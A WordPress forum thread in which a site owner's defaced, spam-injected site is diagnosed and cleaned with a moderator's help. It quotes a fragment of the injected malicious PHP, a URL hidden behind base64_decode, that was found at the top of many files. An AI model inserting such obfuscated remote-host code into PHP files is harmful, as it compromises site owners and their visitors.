Defacement vulnerability in wordpress 2.7.1

what evidence do you have this is a WordPress vulnerability? This would be serious indeed if true and we all would want to know.

Well, I am not a computer expert. That I wrote is what a friend programmer explained to me. My wordpress site is https://www.culebras.tk and the login page is https://www.culebras.ardeenelinfierno.com/culebras/wp-login.php .

You can see in it that no login box appears, and the wp-login.php is ok in my server, I even uploaded again all the wordpress files.

Looking the code you can see lots of ads links injected in it.

I hope you can find the problem in the code of the my login page.

Thanks.

We have the same problem. Installed 2.7.1 to 89 domains on one server. We had no more than set them up in their default state and bam. Now we are getting blank pages, and have lots of weird spam crap in /opt.

The server is out of control, and has to be formatted and re-installed. I know its wordpress because we have CentOS 5.2 running on hundreds of other machines, none of them got broken into except this one.

Would love to provide you with forensics on the box, but somehow they got access to the root account and locked everyone off. I lack the time right now to boot the machine up with a boot disk and investigate it. From what I gathered right before the crash it has to do with the new plugin installer feature because it was generating lots of “out of field data” errors. Looks to me like someone wasn’t properly validating input on their php.

I’m formatting the server now to install Drupal, or perhaps Joomla, and get this CMS issue handled. I’d like to have used wordpress but it just seems too insecure right now.

Regards

Putting on my Karnack the Psychic hat on, I predict that there will be a security vulnerability in WordPress 2.7.1! Or at least a proof of concept. That part is easy and I also predict the stock market will go up and down. A lot.

@realisticone:

I’m formatting the server now to install Drupal, or perhaps Joomla, and get this CMS issue handled. I’d like to have used wordpress but it just seems too insecure right now.

That’s what’s referred to as an inflammatory statement, adding no value whatsoever to the conversation or topic. Much like most of my post right now, but I’ll try to be abstract.

Okay, starting with the basics. Your server got compromised or you were running Apache in a blatantly insecure way. How do I know?

Would love to provide you with forensics on the box, but somehow they got access to the root account and locked everyone off.

The default installation for Apache is to start up a non-privileged uid:gid. On my Ubuntu servers that’s www-data:www-data and that’s done in order to limit any compromises. If a PHP application runs amok or get’s compromised, then you lose control your web server files.

That’s a bad scenario and lots of sites get defaced or spam-link-jacked up that way. But get root access via a PHP app? Possible if PHP or Apache was broken or installed incorrectly but the simpler answer is You’re Doing It All Wrong. Keeping up to date with patches is important and you slipped up somewhere.

@culebras:

I think we’d like to hear from you and find out what happened. As I mentioned at the beginning, there will be an exploit or proof of concept.

I don’t know if that’s what occurred to you or not but any data that you can provide would help. If you don’t feel comfortable sharing on a public forum, then please consider sending info to [email protected]

In the meanwhile, backup your files and database and please give this evolving and changing boiler plate a read.

Read this

https://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

And then read it again.

Read this too

https://codex.www.ads-software.com/Hardening_WordPress

Upgrade to the latest version if you have not already. You need to see if there are any users added to WordPress that you don’t know about/don’t belong there.

You need to go through your files and find where the spammy links are being added. If it’s in wp-config.php or some other file, you’ll need to make sure that is cleaned up before you can consider yourself good file wise. Look everywhere and use fresh copies of your WordPress installation, plugins, and themes.

Look at your posts and comments and see if there are any spammy links there. You can export your whole blog to WXR and then examine the whole thing in your favorite text editor.

Look at your server’s log files. If you are on a shared server, get help from your provider. You need to identify if this was a compromise of WordPress or your server. If you do not identify the entrance which the attacker got in, odds are they will be back.

Once you have cleaned up your hacked blog, harden it so this does not happen again.

Good luck.

Well I want to give thanks to jdembowski for the answers, the links and the explanations. As I said before, I am a simple wordpress user, not an expert, so I am sorry if I am not calling the things with the correct name. Therefore, my English is not very good so I am sorry about that too.

By the way, I will take my time to read your explanations carefully and I will try to identify the problem. For example, the blank pages with ad scrap occurs in others pages besides wp-config.php, and the plugins I install and upgrade frecuently withind wordpress new feature. Anyway my wp theme is old, so I will check it with attention. I will ask for help to my friend, the one whe share the server with me.

Anything I discover I will share here soon in order can be useful for anybody.

Well, I have fixed all the problems. Thanks a lot to jdembowski, because in the link he offered was the solution:

https://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

There were malicious code like:

https://”.base64_decode(“YW55cmVzdWx0cy5uZXQ=”).”/”);

at the beginning of many php files.

I cleaned all the php files affected (all php in theme, almost all php in plugins). Then I downloaded again a fresh installation of worpress, deleted all in my server and I uploaded all the fresh and cleaned stuff.

Speaking with the friend that share the server with me, it looks like that other friend that share the server, uploaded and installed some kind of aplicattion with some security holes. We are not sure if that was the reason to wordpress was hacked. The truth is that was NOT a problem of wordpress.

Anyway, if anybody more has this problem, following the instructions provided by jdembowski will find solution very probably.

Thanks a lot for the help.

culebras,

Thanks for letting us know and good job tracking that down and taking care of it.

Now you’ll have to provide assistance to more people here for when this happens to them ??